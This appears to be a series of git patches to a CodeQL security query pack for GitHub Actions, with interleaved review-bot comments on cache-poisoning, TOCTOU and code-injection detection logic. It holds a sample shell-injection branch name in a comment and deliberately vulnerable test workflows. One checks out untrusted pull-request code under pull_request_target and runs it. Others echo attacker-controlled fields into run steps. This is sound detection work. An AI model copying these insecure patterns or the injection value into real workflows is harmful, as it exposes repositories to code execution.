default_branch_name + or + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = default_branch_name and + not e.getAPropertyValue("branches-ignore") = default_branch_name + ) ) ) ) 
From 1a4939a13ba37ccd1d6dac0a8bc6af63c8c28888 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 16:19:58 +0200 Subject: [PATCH 283/707] Apply suggestions from code review MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Alvaro Muñoz --- ql/lib/ext/workflow-models/workflow-models.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index 2293080d93eb..f71f2081c8fd 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -2,8 +2,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all extensible: repositoryDataModel - data: - - ["public", "main"] + data: [] - addsTo: pack: githubsecuritylab/actions-all extensible: workflowDataModel From 11edff936b2a66da31ae278b9f9efe6104c0d62f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 15:27:59 +0000 Subject: [PATCH 284/707] Fix tests --- .../actions/security/CachePoisoningQuery.qll | 63 +++++++++++-------- 1 file changed, 36 insertions(+), 27 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 69590a4a0de3..d2a5909206e3 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
@@ -11,39 +11,48 @@ string defaultBranchTriggerEvent() { ] } +string defaultBranchNames() { + exists(string default_branch_name | + repositoryDataModel(_, default_branch_name) and + result = default_branch_name + ) + or + not exist(string default_branch_name | + repositoryDataModel(_, default_branch_name) and + result = ["main", "master"] + ) +} + predicate runsOnDefaultBranch(Job j) { exists(Event e | j.getATriggerEvent() = e and - exists(string default_branch_name | - repositoryDataModel(_, default_branch_name) and + ( + e.getName() = defaultBranchTriggerEvent() and + not e.getName() = "pull_request_target" + or + e.getName() = "push" and + e.getAPropertyValue("branches") = defaultBranchNames() + or + e.getName() = "pull_request_target" and ( - e.getName() = defaultBranchTriggerEvent() and - not e.getName() = "pull_request_target" + // no filtering + not e.hasProperty("branches") and not e.hasProperty("branches-ignore") + or + // only branches-ignore filter + e.hasProperty("branches-ignore") and + not e.hasProperty("branches") and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() or - e.getName() = "push" and - e.getAPropertyValue("branches") = default_branch_name + // only branches filter + e.hasProperty("branches") and + not e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = defaultBranchNames() or - e.getName() = "pull_request_target" and - ( - // no filtering - not e.hasProperty("branches") and not e.hasProperty("branches-ignore") - or - // only branches-ignore filter - e.hasProperty("branches-ignore") and - not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = default_branch_name - or - // only branches filter - e.hasProperty("branches") and - not e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = default_branch_name - or - // branches and branches-ignore filters - e.hasProperty("branches") and - e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = 
default_branch_name and - not e.getAPropertyValue("branches-ignore") = default_branch_name - ) + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = defaultBranchNames() and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() ) ) ) From 17a6d28e18db8b8c61e0ce9275570fc91e18e1f8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 15:37:17 +0000 Subject: [PATCH 285/707] Fix OR --- ql/lib/codeql/actions/security/CachePoisoningQuery.qll | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index d2a5909206e3..3cb84561b54c 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -18,9 +18,9 @@ string defaultBranchNames() { ) or not exist(string default_branch_name | - repositoryDataModel(_, default_branch_name) and - result = ["main", "master"] - ) + repositoryDataModel(_, default_branch_name) + ) and + result = ["main", "master"] } predicate runsOnDefaultBranch(Job j) { From 00052d1ea117af39d03fce6c71d3273421982277 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 15:37:57 +0000 Subject: [PATCH 286/707] exists --- ql/lib/codeql/actions/security/CachePoisoningQuery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 3cb84561b54c..318548859b55 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
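Review bot: The fallback in the new `defaultBranchNames()` drops `"default"`, which the hard-coded list removed in PATCH 279 still contained (`["main", "master", "default"]`), so a workflow whose branch filter names that branch stops being treated as running on the default branch; if that is intentional the predicate's doc should say so, otherwise restore it in the `result = ["main", "master"]` line. Separately, every comparison `e.getAPropertyValue("branches") = defaultBranchNames()` and its `branches-ignore` counterpart is an exact string match, while GitHub evaluates these filters as glob patterns, so a filter such as `main*` or `**` that does match the default branch is not recognised and runsOnDefaultBranch silently misses the job; at minimum a QLDoc on runsOnDefaultBranch (it has none) should state that only literal branch names are understood. The same exact-match limitation is present in the earlier hunks of this file in PATCH 279 and 282.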
@@ -17,7 +17,7 @@ string defaultBranchNames() { result = default_branch_name ) or - not exist(string default_branch_name | + not exists(string default_branch_name | repositoryDataModel(_, default_branch_name) ) and result = ["main", "master"] From 6f87b755045f4b4121a3700efb11246a4081e540 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 17:44:16 +0200 Subject: [PATCH 287/707] Update test.yml --- .github/workflows/test.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 8b14b75062a5..96fd8bdd1a4b 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -1,6 +1,8 @@ name: Tests on: push: + branches: + - master pull_request: workflow_dispatch: From 731889bf88bde11f09ecf4039982cddf6cfc04ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 15 May 2024 21:29:51 +0200 Subject: [PATCH 288/707] Bump qlpack versions --- ql/lib/codeql/actions/security/SelfHostedQuery.qll | 5 +++-- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 3047ba35b064..03b6c87405e7 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -38,8 +38,9 @@ predicate staticallyIdentifiedSelfHostedRunner(Job job) { */ predicate dynamicallyIdentifiedSelfHostedRunner(Job job) { exists(string runner_info | - workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), - "public", job.getId(), _, _, runner_info) and + repositoryDataModel("public", _) and + workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), _, + job.getId(), _, _, runner_info) and runner_info.indexOf("self-hosted:true") > 0 ) } 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 54748d6fd623..7413744d3ff1 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.24 +version: 0.0.25 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 1b8d7e64028c..6bb27759f068 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.24 +version: 0.0.25 groups: - actions - queries From 446765bcbb4fc89d459d805cd2b97f2c17072c7a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 15 May 2024 22:08:03 +0200 Subject: [PATCH 289/707] Update Cache Poisoning rule --- ql/src/Security/CWE-349/CachePoisoning.ql | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 11da318f474d..0250d9aada1d 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -18,11 +18,10 @@ import codeql.actions.security.PoisonableSteps from LocalJob j, PRHeadCheckoutStep checkout, Step s where - // Excluding privileged workflows since they can be easily exploited in similar circumstances - not j.isPrivileged() and // The workflow runs in the context of the default branch runsOnDefaultBranch(j) and // The job checkouts untrusted code from a pull request + // TODO: Consider adding artifact downloads as a potential source of cache poisoning j.getAStep() = checkout and ( // The job writes to the cache 
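Review bot: The retained condition `runner_info.indexOf("self-hosted:true") > 0` in `dynamicallyIdentifiedSelfHostedRunner` excludes a match at offset 0, because QL's `indexOf` yields `0` when the substring starts the string; if the runner column of `workflowDataModel` can begin with that token, such jobs are never classified as self-hosted. `runner_info.matches("%self-hosted:true%")` (or `>= 0`) makes the check independent of how the model row is laid out. I cannot see the runner column format from this hunk, so this only matters if the token can appear first; the new `repositoryDataModel("public", _)` gate is a separate, correct fix for the trigger column previously being compared against `"public"`.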
@@ -33,7 +32,9 @@ where // The job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() = s and - s instanceof PoisonableStep + s instanceof PoisonableStep and + // Excluding privileged workflows since they can be easily exploited in similar circumstances + not j.isPrivileged() ) select checkout, "Potential cache poisoning in the context of the default branch on step $@.", s, s.toString() From 888b9fecca8c9c3c1ee450139e7d19886906d26d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 10:28:24 +0200 Subject: [PATCH 290/707] Reduce FP for actor/association checks that cannot be bypassed this way --- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 2 +- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index c5e12c0fccc1..a3fcc9e0403d 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -15,7 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from ControlCheck check, MutableRefCheckoutStep checkout +from LabelControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index b74c3389f9d9..562fc0809b7a 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
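Review bot: After this move, `not j.isPrivileged()` guards only the "executes checked-out code" disjunct, so a privileged job that checks out the PR head and then writes to the cache is now reported by this query too; that looks intentional (a poisoned cache is a distinct outcome from the code execution the untrusted-checkout queries presumably already cover), but the retained comment `Excluding privileged workflows since they can be easily exploited in similar circumstances` no longer explains why the exclusion is one-sided. Suggest `// Privileged jobs that execute untrusted code are reported by the untrusted-checkout queries, so only non-privileged jobs are reported for this path; cache writes are reported regardless of privilege.` so the next reader does not move the check back to the top of the `where` clause. The `where` clause starts above this hunk.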
@@ -15,7 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from ControlCheck check, MutableRefCheckoutStep checkout +from LabelControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and From c47fdd123d8db73c51ce9b3802daca1a06a3f43c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Thu, 16 May 2024 10:56:01 +0200 Subject: [PATCH 291/707] Create label_actor.yml --- .../CWE-367/.github/workflows/label_actor.yml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml new file mode 100644 index 000000000000..1debaecf97d3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml @@ -0,0 +1,17 @@ +# Making Label gates the only ones bypassable with TOCTOU races since actor or association ones should not be bypassable +name: Label Trigger Test +on: + pull_request_target: + types: [labeled] + branches: [main] + +jobs: + integration-tests: + runs-on: ubuntu-latest + if: github.repository_owner == 'npm' && github.actor == 'dependabot[bot]' + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: bash label_example/tests.sh From 1b4246e7f18fc947c67810f7370786bc7cf274ea Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 11:32:21 +0200 Subject: [PATCH 292/707] Update tests for cache poisoning --- ql/test/query-tests/Security/CWE-349/CachePoisoning.expected | 1 + 1 file changed, 1 insertion(+) 
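Review bot: Narrowing `check` to `LabelControlCheck` drops actor/association gates, which is sound when the gate is on the PR author, but an approval-based gate (e.g. `github.event.review.state == 'approved'` on `pull_request_review`) is racy in exactly the way a label is — the author can push to the mutable ref after the approval was given — so if the `ControlCheck` hierarchy has a review/approval-based class it should stay in the `from` clause alongside `LabelControlCheck`. I cannot see the `ControlCheck` hierarchy from this hunk, so confirm what `LabelControlCheck` covers before relying on the commit message's claim that only label gates are bypassable. The same change is applied to UntrustedCheckoutTOCTOUCritical.ql in the previous hunk.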
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index f0ee6d700014..6bef24d86d79 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -6,5 +6,6 @@ | .github/workflows/test8.yml:12:9:15:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | | .github/workflows/test8.yml:23:9:26:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | | .github/workflows/test8.yml:34:9:37:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | +| .github/workflows/test11.yml:14:9:19:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Uses Step | | .github/workflows/test15.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Uses Step | | .github/workflows/test16.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Uses Step | From f325d40a2274d883986bef4c2ab8dff2a1943538 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 15:55:12 +0200 Subject: [PATCH 293/707] Ensure event sources are available for triggering events --- .../codeql/actions/dataflow/ExternalFlow.qll | 33 ++++++++-- .../codeql/actions/dataflow/FlowSources.qll | 63 ++++++++++++++++--- .../internal/ExternalFlowExtensions.qll | 18 ++++-- .../ext/workflow-models/workflow-models.yml | 48 ++++++++++++++ .../.github/workflows/pull_request_target.yml | 5 +- .../CWE-094/.github/workflows/self_needs.yml | 2 +- .../Security/CWE-094/CodeInjection.expected | 8 +-- .../CWE-094/PrivilegedCodeInjection.expected | 13 ++-- .../Security/CWE-094/action1/action.yml | 14 ----- 9 files changed, 154 insertions(+), 50 deletions(-) delete mode 100644 ql/test/query-tests/Security/CWE-094/action1/action.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index f10a90ee6ee2..a52cc427d359 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
@@ -2,19 +2,42 @@ private import internal.ExternalFlowExtensions as Extensions private import codeql.actions.DataFlow private import actions +/** + * MaD models for workflow details + * Fields: + * - path: Path to the workflow file + * - trigger: Trigger for the workflow + * - job: Job name + * - secrets_source: Source of secrets + * - permissions: Permissions for the workflow + * - runner: Runner info for the workflow + */ predicate workflowDataModel( - string path, string trigger, string job, string secrets_source, string permissions, - string runner + string path, string trigger, string job, string secrets_source, string permissions, string runner ) { Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) } -predicate repositoryDataModel( - string visibility, string default_branch_name -) { +/** + * MaD models for repository details + * Fields: + * - visibility: Visibility of the repository + * - default_branch_name: Default branch name + */ +predicate repositoryDataModel(string visibility, string default_branch_name) { Extensions::repositoryDataModel(visibility, default_branch_name) } +/** + * MaD models for context/trigger mapping + * Fields: + * - trigger: Trigger for the workflow + * - context_prefix: Prefix for the context + */ +predicate contextTriggerDataModel(string trigger, string context_prefix) { + Extensions::contextTriggerDataModel(trigger, context_prefix) +} + /** * MaD sources * Fields: diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 08717c337875..063a3f671a32 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
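Review bot: The new doc on `contextTriggerDataModel` calls the second column a "Prefix for the context", but its consumers in FlowSources.qll test it with `matches("%" + context_prefix + "%")`, i.e. as a substring anywhere in the normalized expression, and `_` in values such as `github.event.pull_request` is a single-character wildcard for `matches`. Suggest `- context_prefix: github context path (e.g. github.event.pull_request) that is populated for the trigger; matched as a substring of the expression, not as a strict prefix` so model authors do not assume anchoring that the code does not perform.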
@@ -95,8 +95,7 @@ private predicate branchEvent(string context) { // - They cannot contain a \ // eg: zzz";echo${IFS}"hello";# would be a valid branch name "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", - "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref", - "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.pull_request\\.head\\.ref", "github\\.event\\.workflow_run\\.head_branch", "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", "github\\.event\\.merge_group\\.head_ref", ] @@ -165,7 +164,8 @@ private predicate pathEvent(string context) { reg = [ // filename - "github\\.event\\.workflow\\.path", + "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.path", + "github\\.event\\.workflow_run\\.referenced_workflows\\.path", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) 
@@ -197,11 +197,33 @@ private predicate jsonEvent(string context) { ) } -class EventSource extends RemoteFlowSource { +class GitHubSource extends RemoteFlowSource { string flag; - EventSource() { - exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | + GitHubSource() { + exists(Expression e, string context, string context_prefix | + this.asExpr() = e and + context = e.getExpression() and + Utils::normalizeExpr(context) = "github.head_ref" and + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and + Utils::normalizeExpr(context).matches("%" + context_prefix + "%") and + flag = "branch" + ) + } + + override string getSourceType() { result = flag } +} + +class GitHubEventSource extends RemoteFlowSource { + string flag; + + GitHubEventSource() { + exists(Expression e, string context, string context_prefix | + this.asExpr() = e and + context = e.getExpression() and + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and + Utils::normalizeExpr(context).matches("%" + context_prefix + "%") + | titleEvent(context) and flag = "title" or urlEvent(context) and flag = "url" 
@@ -217,8 +239,33 @@ class EventSource extends RemoteFlowSource { usernameEvent(context) and flag = "username" or pathEvent(context) and flag = "filename" - or - jsonEvent(context) and flag = "json" + ) + } + + override string getSourceType() { result = flag } +} + +class GitHubEventJsonSource extends RemoteFlowSource { + string flag; + + GitHubEventJsonSource() { + exists(Expression e, string context | + this.asExpr() = e and + context = e.getExpression() and + ( + jsonEvent(context) and + ( + exists(string context_prefix | + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + Utils::normalizeExpr(context).matches("%" + context_prefix + "%") + ) + or + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and + Utils::normalizeExpr(context).regexpMatch(".*\\bgithub.event\\b.*") + ) + ) and + flag = "json" ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 34f0297d7998..415c02dc1ba1 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll 
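Review bot: `GitHubSource` only fires when the normalized expression is exactly `github.head_ref`, whereas the `branchEvent` regex it replaces (removed in the earlier hunk) matched the context inside a larger expression, so a compound expression such as `${{ github.head_ref || github.ref_name }}` or `${{ format('{0}', github.head_ref) }}` stops being a branch source. The `matches("%" + context_prefix + "%")` conjunct already does the substring check against the `github.head_ref` rows of `contextTriggerDataModel`, so dropping the equality — or replacing it with `Utils::normalizeExpr(context).matches("%github.head_ref%")` — keeps the previous coverage while still gating on the trigger. If `Utils::wrapRegexp` was already anchoring the old match to the whole expression this is moot; I cannot see it from here.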
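Review bot: In `GitHubEventJsonSource` the fallback `regexpMatch(".*\\bgithub.event\\b.*")` leaves the dot unescaped and, more importantly, fires for any modeled trigger as long as a `github.event` token is present, so `${{ toJSON(github.event.issue) }}` under `pull_request_target` is still a source even though the non-JSON path now rejects `github.event.issue` as not defined for that trigger (the test comment in pull_request_target.yml changed to exactly that expectation). If the intent is that whole-payload dumps like `toJSON(github.event)` remain a source while sub-objects follow the trigger mapping, anchor the regex to the bare object, e.g. `".*\\bgithub\\.event\\b(?![.\\[]).*"`; hedged, since `jsonEvent` is defined above this hunk and I cannot see what it matches.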
@@ -23,11 +23,19 @@ extensible predicate sinkModel( string action, string version, string input, string kind, string provenance ); +/** + * Holds if workflow data model exists for the given parameters. + */ extensible predicate workflowDataModel( - string path, string trigger, string job, string secrets_source, string permissions, - string runner + string path, string trigger, string job, string secrets_source, string permissions, string runner ); -extensible predicate repositoryDataModel( - string visibility, string default_branch_name -); +/** + * Holds if repository data model exists for the given parameters. + */ +extensible predicate repositoryDataModel(string visibility, string default_branch_name); + +/** + * Holds if context/trigger mapping exists for the given parameters. + */ +extensible predicate contextTriggerDataModel(string trigger, string context_prefix); diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index f71f2081c8fd..404e894a5f8a 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml 
@@ -7,3 +7,51 @@ extensions: pack: githubsecuritylab/actions-all extensible: workflowDataModel data: [] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: contextTriggerDataModel + data: + # This predicate maps triggering events with the github event context available for that event + - ["commit_comment", "github.event.comment"] + - ["discussion", "github.event.discussion"] + - ["discussion_comment", "github.event.comment"] + - ["discussion_comment", "github.event.discussion"] + - ["issues", "github.event.issue"] + - ["issue_comment", "github.event.issue"] + - ["issue_comment", "github.event.comment"] + - ["gollum", "github.event.pages"] + - ["merge_group", "github.event.merge_group"] + - ["pull_request", "github.event.pull_request"] + - ["pull_request", "github.head_ref"] + - ["pull_request_comment", "github.event.comment"] + - ["pull_request_comment", "github.event.pull_request"] + - ["pull_request_comment", "github.head_ref"] + - ["pull_request_review", "github.event.pull_request"] + - ["pull_request_review", "github.event.review"] + - ["pull_request_review", "github.head_ref"] + - ["pull_request_review_comment", "github.event.comment"] + - ["pull_request_review_comment", "github.event.pull_request"] + - ["pull_request_review_comment", "github.event.review"] + - ["pull_request_review_comment", "github.head_ref"] + - ["pull_request_target", "github.event.pull_request"] + - ["pull_request_target", "github.head_ref"] + - ["push", "github.event.commits"] + - ["push", "github.event.head_commit"] + - ["repository_dispatch", "github.event.client_payload"] + - ["workflow_dispatch", "github.event.inputs"] + - ["workflow_run", "github.event.workflow"] + - ["workflow_run", "github.event.workflow_run"] + # workflow_call receives the same event payload as the calling workflow + - ["workflow_call", "github.event.client_payload"] + - ["workflow_call", "github.event.comment"] + - ["workflow_call", "github.event.commits"] + - ["workflow_call", 
"github.event.discussion"] + - ["workflow_call", "github.event.head_commit"] + - ["workflow_call", "github.event.inputs"] + - ["workflow_call", "github.event.issue"] + - ["workflow_call", "github.event.merge_group"] + - ["workflow_call", "github.event.pages"] + - ["workflow_call", "github.event.pull_request"] + - ["workflow_call", "github.event.review"] + - ["workflow_call", "github.event.workflow"] + - ["workflow_call", "github.event.workflow_run"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml index 995fefe4a15e..4ca3753f50cd 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml @@ -4,8 +4,8 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, but we will still report it - - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, but we will still report it + - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, so we should not report it + - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, so we should not report it - run: echo '${{ github.event.pull_request.title }}' - run: echo '${{ github.event.pull_request.body }}' - run: echo '${{ github.event.pull_request.head.label }}' @@ -14,3 +14,4 @@ jobs: - run: echo '${{ github.event.pull_request.head.repo.homepage }}' - run: echo '${{ github.event.pull_request.head.ref }}' - run: echo '${{ github.head_ref }}' + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml index afd39605bb31..9992fd8e4cbd 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml 
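Review bot: The `workflow_call` block mirrors every `github.event.*` prefix of the caller but omits `github.head_ref`, so a reusable workflow invoked from a `pull_request`/`pull_request_target` caller that uses `${{ github.head_ref }}` gets no branch source even though the comment above the block says it receives the caller's payload; add `- ["workflow_call", "github.head_ref"]`. Separately, `pull_request_comment` is not a GitHub Actions event name (GitHub's docs point users to `issue_comment` for PR comments), so its three rows can never match a trigger and are dead data — either drop them or move the `github.event.pull_request`/`github.head_ref` rows under the event you actually meant. Since this file is the only place that decides which contexts count as attacker-controlled per trigger, a missing row here is a silent false negative across every query.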
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml @@ -13,7 +13,7 @@ jobs: - id: source uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['head_commit']['message'] }} + source: ${{ github.event['comment']['body'] }} find: 'foo' replace: '' - run: ${{ steps.source.outputs.value }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 34e173a055b5..dc653a074e98 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -50,7 +50,7 @@ edges | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | | 